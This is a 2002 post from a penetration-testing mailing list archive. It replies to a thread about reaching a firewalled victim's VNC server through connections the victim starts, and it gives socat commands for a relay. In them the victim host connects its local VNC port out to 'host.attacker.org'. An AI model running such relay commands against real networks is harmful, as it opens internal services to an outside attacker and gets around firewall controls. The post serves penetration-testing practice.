Penetration Testing mailing list archives
Re: TCP/IP GenderChanger
From: Gerhard Rieger <gerhard.rieger () dest-unreach com>
Date: Wed, 31 Jul 2002 21:51:22 +0200 (CEST)
[sorry if double] You might use socat from http://www.dest-unreach.org/socat/ as "gender changer". On your outside server host.attacker.org run it as double server: socat tcp-l:80 tcp-l:5900 or, for multiple connections, with access restrictions, logging etc: socat -d -d tcp-l:80,fork,range=host.victim.org/24,reuseaddr tcp-l:5900,range=localhost/32,reuseaddr and on host.victim.org: socat tcp:localhost:5900 tcp:host.attacker.org:80 This scenario was one of socats design goals, after I had to realize that netcat with its derivatives and the usual port forwarders could not easily be used for things like these. regards Gerhard Rieger Ivan Buetler wrote:
Hi there, The following article will discuss bidirectional inside-out attacks, inspired from netcat. The article discusses how to access a victims VNC server behind a firewall, where the victim initiates connectons to the attacker. http://www.csnc.ch/downloads/docs/techdocs/TCP-IP_GenderChanger_CSNC_V1.0.pdf
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- TCP/IP GenderChanger Ivan Buetler (Jul 30)
- <Possible follow-ups>
- Re: TCP/IP GenderChanger Gerhard Rieger (Jul 31)